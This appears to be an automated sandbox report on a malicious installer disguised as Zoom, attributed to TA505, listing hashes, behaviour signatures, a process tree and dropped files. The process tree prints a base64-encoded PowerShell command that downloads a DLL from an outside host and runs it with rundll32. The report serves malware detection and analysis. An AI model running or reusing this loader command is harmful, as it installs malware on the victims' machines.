Analysis

  • max time kernel
    117s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2023 18:14

General

  • Target

    Zoom malware.msi

  • Size

    11.0MB

  • MD5

    c4e9e9a06001c6197de2ea2fec3d2214

  • SHA1

    369006350f6b4c43c7f51a90deb5e73a20156b55

  • SHA256

    e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c

  • SHA512

    00008fd26c3047afbbc73fc19d20700861e9501b1c9509b7abcfd218a814a2b0aa24fa934338942aee809ca53240b539e77f6d91013cae0eee076282e4047156

  • SSDEEP

    196608:6e9dQDU9N3glGcBo/6xDD7yLEY2sNd0nOn1q1eUD9p8b3lWG7uCMkCA:N8g91gGcBD7yLfmz1rGYG6CMi

Score
10/10

Malware Config

Signatures

  • TA505

    Cybercrime group active since 2015, responsible for families like Dridex and Locky.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\Zoom malware.msi"
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4984
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3404
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 551033C3926859CFB4EEC3A84940C17C
      2⤵
      • Loads dropped DLL
      PID:1808
    • C:\Windows\Installer\MSID1B2.tmp
      "C:\Windows\Installer\MSID1B2.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
      2⤵
      • Executes dropped EXE
      PID:3552
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
    1⤵
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3944
    • C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\ProgramData\30d2e145.dat",DllRegisterServer
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\system32\rundll32.exe" "C:\ProgramData\30d2e145.dat",DllRegisterServer
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Windows\SysWOW64\explorer.exe
          explorer.exe "C:\Users\Admin\AppData\Local\Temp\8A1A.tmp.bat"
          4⤵
            PID:4204
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8A1A.tmp.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3108
        • C:\Windows\system32\rundll32.exe
          rundll32.exe "C:\ProgramData\30d2e145.dat",DllRegisterServer
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1552
          • C:\Windows\SysWOW64\rundll32.exe
            rundll32.exe "C:\ProgramData\30d2e145.dat",DllRegisterServer
            4⤵
            • Loads dropped DLL
            PID:4904

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\30d2e145.dat

      Filesize

      110KB

      MD5

      0a30ee6289c377e8ae6126b9db668f69

      SHA1

      3241a96b49b15a6e37c7533b50432addd6621901

      SHA256

      95770e1963a96f7f33000992d5e705b83ef2a81dbc91461ea9913a7119aacc04

      SHA512

      bd6bd689f9ea5bb9d6a1b964572abb610fd2fdb4aa7d4bc2f2db04f2862cb3158d9dc2a080a50797ebb4b4784c4a657c1a0f4a3a0896d26b17b315d172866df1

    • C:\ProgramData\30d2e145.dat

      Filesize

      110KB

      MD5

      0a30ee6289c377e8ae6126b9db668f69

      SHA1

      3241a96b49b15a6e37c7533b50432addd6621901

      SHA256

      95770e1963a96f7f33000992d5e705b83ef2a81dbc91461ea9913a7119aacc04

      SHA512

      bd6bd689f9ea5bb9d6a1b964572abb610fd2fdb4aa7d4bc2f2db04f2862cb3158d9dc2a080a50797ebb4b4784c4a657c1a0f4a3a0896d26b17b315d172866df1

    • C:\ProgramData\30d2e145.dat

      Filesize

      110KB

      MD5

      0a30ee6289c377e8ae6126b9db668f69

      SHA1

      3241a96b49b15a6e37c7533b50432addd6621901

      SHA256

      95770e1963a96f7f33000992d5e705b83ef2a81dbc91461ea9913a7119aacc04

      SHA512

      bd6bd689f9ea5bb9d6a1b964572abb610fd2fdb4aa7d4bc2f2db04f2862cb3158d9dc2a080a50797ebb4b4784c4a657c1a0f4a3a0896d26b17b315d172866df1

    • C:\Users\Admin\AppData\Local\Temp\8A1A.tmp.bat

      Filesize

      87B

      MD5

      841691b1914f9787edeeaff47b56b2e3

      SHA1

      42486921ad57f528755a4b28b33342383a2631da

      SHA256

      0036756049951a1e93167563dce1b6ed1125a2f8158d76f5dd14e3db84676b03

      SHA512

      23fa0c547d49cde56f0ba96ad8db40114ad137cbb3e4d465dd2e61e3209549fd6cf9dccc9d3c790cf87f0dd21d2d2379e54b72b24098484be0810f320530f81f

    • C:\Windows\Installer\MSIC99E.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSIC99E.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSICC7D.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSICC7D.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSICD2A.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSICD2A.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSICD99.tmp

      Filesize

      927KB

      MD5

      b27a994e40bee85c14d3227ea91696a9

      SHA1

      609a959b0f47865803e2c45a8bc4390f1d08b57a

      SHA256

      ebf432e9b8068e139e85e2c26a1d67238b3c6071158cd43f4926029ba187c190

      SHA512

      66b2cfa6b7c3cf793f478bc69e084e4ea008dab4101eaf8ce3143291d94dbcebedccd29c309d56185261fdbcccd30697cd898bf8ce8e1f9dcdf12fc2037d1542

    • C:\Windows\Installer\MSICD99.tmp

      Filesize

      927KB

      MD5

      b27a994e40bee85c14d3227ea91696a9

      SHA1

      609a959b0f47865803e2c45a8bc4390f1d08b57a

      SHA256

      ebf432e9b8068e139e85e2c26a1d67238b3c6071158cd43f4926029ba187c190

      SHA512

      66b2cfa6b7c3cf793f478bc69e084e4ea008dab4101eaf8ce3143291d94dbcebedccd29c309d56185261fdbcccd30697cd898bf8ce8e1f9dcdf12fc2037d1542

    • C:\Windows\Installer\MSICE84.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSICE84.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSID1B2.tmp

      Filesize

      549KB

      MD5

      6aac525cfcdd6d3978c451bba2bb9cb3

      SHA1

      417a1c4312bdaadf832acf153c423906365fb027

      SHA256

      9dbaf4e4632e70652ff72bb7890c35e3b9cd7a6939b29b5eeec0c636d098c64e

      SHA512

      3c39487dbfdb6ee84cc5eddd5e8e9d1610ffb9fe55913e47f126b47d6fd5bc04b691a9bb765963d998b3db92d87192a4a91807bbe7559bfc4804a7c2beb32f42

    • memory/3944-151-0x00007FFD33320000-0x00007FFD33DE1000-memory.dmp

      Filesize

      10.8MB

    • memory/3944-146-0x00007FFD33320000-0x00007FFD33DE1000-memory.dmp

      Filesize

      10.8MB

    • memory/3944-145-0x0000021C337A0000-0x0000021C337C2000-memory.dmp

      Filesize

      136KB